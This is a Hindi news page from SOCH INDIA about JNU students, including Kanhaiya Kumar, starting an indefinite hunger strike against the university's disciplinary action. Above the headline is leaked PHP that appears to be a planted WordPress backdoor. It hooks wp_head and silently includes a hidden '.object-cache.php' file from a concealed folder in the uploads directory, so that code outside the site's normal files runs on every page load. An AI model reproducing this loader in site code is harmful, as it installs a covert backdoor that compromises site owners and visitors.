add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बेमियादी भूख हड़ताल पर बैठे JNU छात्र, कन्हैया भी शामिल – SOCH INDIA
Menu

देश
बेमियादी भूख हड़ताल पर बैठे JNU छात्र, कन्हैया भी शामिल

nobanner

जवाहर लाल नेहरू विश्वविद्यालय (जेएनयू) की दंडात्मक कार्रवाई को निष्प्रभावी करने की मांग करते हुए विश्वविद्यालय के छात्रों ने बुधवार से अनिश्चितकालीन भूख हड़ताल शुरू कर दी। नौ फरवरी की विवादास्पद घटना को लेकर जेएनयू ने कुछ छात्रों पर दंडात्मक कार्रवाई की है। जेएनयू छात्रसंघ के अध्यक्ष कन्हैया कुमार ने उमर खालिद, अनिर्बान भट्टाचार्य और विश्वविद्यालय के अन्य छात्रों के साथ बुधवार रात से भूख हड़ताल शुरू की।

भूख हड़ताल शुरू करते हुए छात्रों ने कहा कि उन लोगों ने मामले की जांच करने वाली उच्च स्तरीय जांच समिति के निष्कर्षों और सिफारिशों को खारिज कर दिया है। कन्हैया, उमर और अनिर्बान भट्टाचार्य को फरवरी में संसद पर हमले के दोषी अफजल गुरू की फांसी के विरोध में कैंपस में कार्यक्रम आयोजित करने पर देशद्रोह के मामले में गिरफ्तार किया गया था। इस कार्यक्रम में कथित तौर पर राष्ट्र विरोधी नारे लगे थे। सभी आरोपी अभी जमानत पर बाहर है।

बेमियादी भूख हड़ताल पर बैठे JNU छात्र, कन्हैया भी शामिल
जेएनयू छात्रसंघ के अध्यक्ष कन्हैया कुमार ने उमर खालिद, अनिर्बान भट्टाचार्य और विश्वविद्यालय के अन्य छात्रों के साथ बुधवार रात से भूख हड़ताल शुरू की।

गौरतलब है कि 9 फरवरी को लगे भारत विरोधी नारे के मामले में जेएनयू की जांच कमेटी ने 21 छात्रों को दोषी पाया था। सभी ने प्रॉक्टर को लिखित में अपना जबाव दिया था। अपनी रिपोर्ट में प्रॉक्टर ने वाइस चांसलर (वीसी) को लिखा था कि तीन छात्रों को निकाल दिया जाना चाहिए, जबकि बाकी के छात्रों से फाइन लिया जाए। इस मामले पर आखिरी फैसला वीसी को करना था।